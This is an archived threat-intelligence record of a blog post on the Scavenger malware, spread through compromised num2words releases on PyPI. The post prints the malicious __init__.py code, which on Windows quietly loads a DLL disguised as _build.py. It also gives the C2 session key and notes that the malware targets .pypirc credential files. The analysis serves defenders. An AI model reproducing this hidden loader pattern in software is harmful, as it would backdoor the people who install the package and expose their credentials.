{
	"id": "6bc10ba3-f75b-4093-8e67-de1a4f1c4454",
	"created_at": "2026-04-06T00:12:46.034851Z",
	"updated_at": "2026-04-10T03:21:34.945558Z",
	"deleted_at": null,
	"sha1_hash": "43827f6e63e179d019a0af63b167255322e29bc9",
	"title": "Scavenger Malware Distributed via num2words PyPI Supply Chain Compromise",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 223614,
	"plain_text": "Scavenger Malware Distributed via num2words PyPI Supply Chain Compromise\r\nArchived: 2026-04-05 22:06:11 UTC\r\nOverview\r\nOn Monday, July 28th, security researcher @johnk3r tagged the Invoke RE Twitter/X account in a post stating that the num2words PyPI package had been compromised and that v0.5.15 was exhibiting signs of distributing the Scavenger malware: https://x.com/johnk3r/status/1949862337340461528.\r\nThe user @SFLinux then confirmed that “there was a Phishing attack on PyPI this morning” (likely meaning that the package maintainers were phished) and that the compromised version v0.5.15 had been removed from PyPI. Cedric Brisson provided us with the compromised package, which we confirmed contained a Scavenger Loader DLL with nearly identical functionality to the one used in the eslint-config-prettier compromise on July 18th. Later, the project distributed v0.5.16 of the package; however, the code was still backdoored. After back-and-forth with Cedric Brisson, the maintainer confirmed that a malicious token was still present within their account and that the token had been removed to prevent further compromises.\r\nThis blog covers the infection vector used by the compromised num2words PyPI package to execute the Scavenger Loader on infected systems, and its follow-on stealer payloads.\r\nInfection Vector\r\nv0.5.15 of num2words contains a small change within the package’s __init__.py file (num2words-0.5.15/__init__.py):\r\nimport os\r\nimport platform\r\nimport sys\r\nimport ctypes\r\ntry:\r\n    if platform.system() == \"Windows\":\r\n        here = os.path.abspath(os.path.dirname(__file__))\r\n        ct = getattr(sys.modules[__name__], \"ctypes\")\r\n        help = getattr(ct, \"CDLL\")(os.path.join(here, \"_build.py\"))\r\n        getattr(help, \"main\")()\r\nexcept:\r\n    print(\"\")\r\nIf this Python code is executed on a Microsoft Windows machine during package initialization, the _build.py file, which is actually a Microsoft Windows DLL with a build timestamp of 2025-07-28 07:22:19 +00:00 (UTC), is loaded and the main export within the DLL is executed.\r\nScavenger Loader\r\nThe DLL is a variant of the Scavenger Loader that we detailed in our previous blog; however, it uses a new set of command-and-control addresses (listed in the Indicators of Compromise below) and a different XXTEA session key, N13r4xLz, during C2 communications. The loader also targets .pypirc files for exfiltration from infected systems. These configuration files often contain repository credentials (likely intended for further compromises). Like the previously analyzed version, the C2 provides three separate stealer modules that are available to download from the C2:\r\n[{\"enabled\": true, \"identifier\": \"shiny\", \"drop_name\": \"version.dll\", \"next_to_match\": \"notification_helper.exe\r\nOur analysis of these stealer modules is ongoing; however, Dr. Web has provided a comprehensive overview of each module and the steps the modules take post-compromise here: https://news.drweb.com/show/?i=15036\u0026lng=en\u0026c=5\r\nIndicators of Compromise\r\nAll samples and C2 URLs related to Scavenger Loader and stealer modules can be found here:\r\nhttps://github.com/Invoke-RE/community-malware-research/blob/main/Research/Loaders/Scavenger/num2words_IOCs.md\r\nSpecial Thanks\r\nCedric Brisson for providing us with the compromised package\r\n@johnk3r for bringing this to our attention\r\nSource: https://invokere.com/posts/2025/07/scavenger-malware-distributed-via-num2words-pypi-supply-chain-compromise/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://invokere.com/posts/2025/07/scavenger-malware-distributed-via-num2words-pypi-supply-chain-compromise/"
	],
	"report_names": [
		"scavenger-malware-distributed-via-num2words-pypi-supply-chain-compromise"
	],
	"threat_actors": [],
	"ts_created_at": 1775434366,
	"ts_updated_at": 1775791294,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/43827f6e63e179d019a0af63b167255322e29bc9.pdf",
		"text": "https://archive.orkl.eu/43827f6e63e179d019a0af63b167255322e29bc9.txt",
		"img": "https://archive.orkl.eu/43827f6e63e179d019a0af63b167255322e29bc9.jpg"
	}
}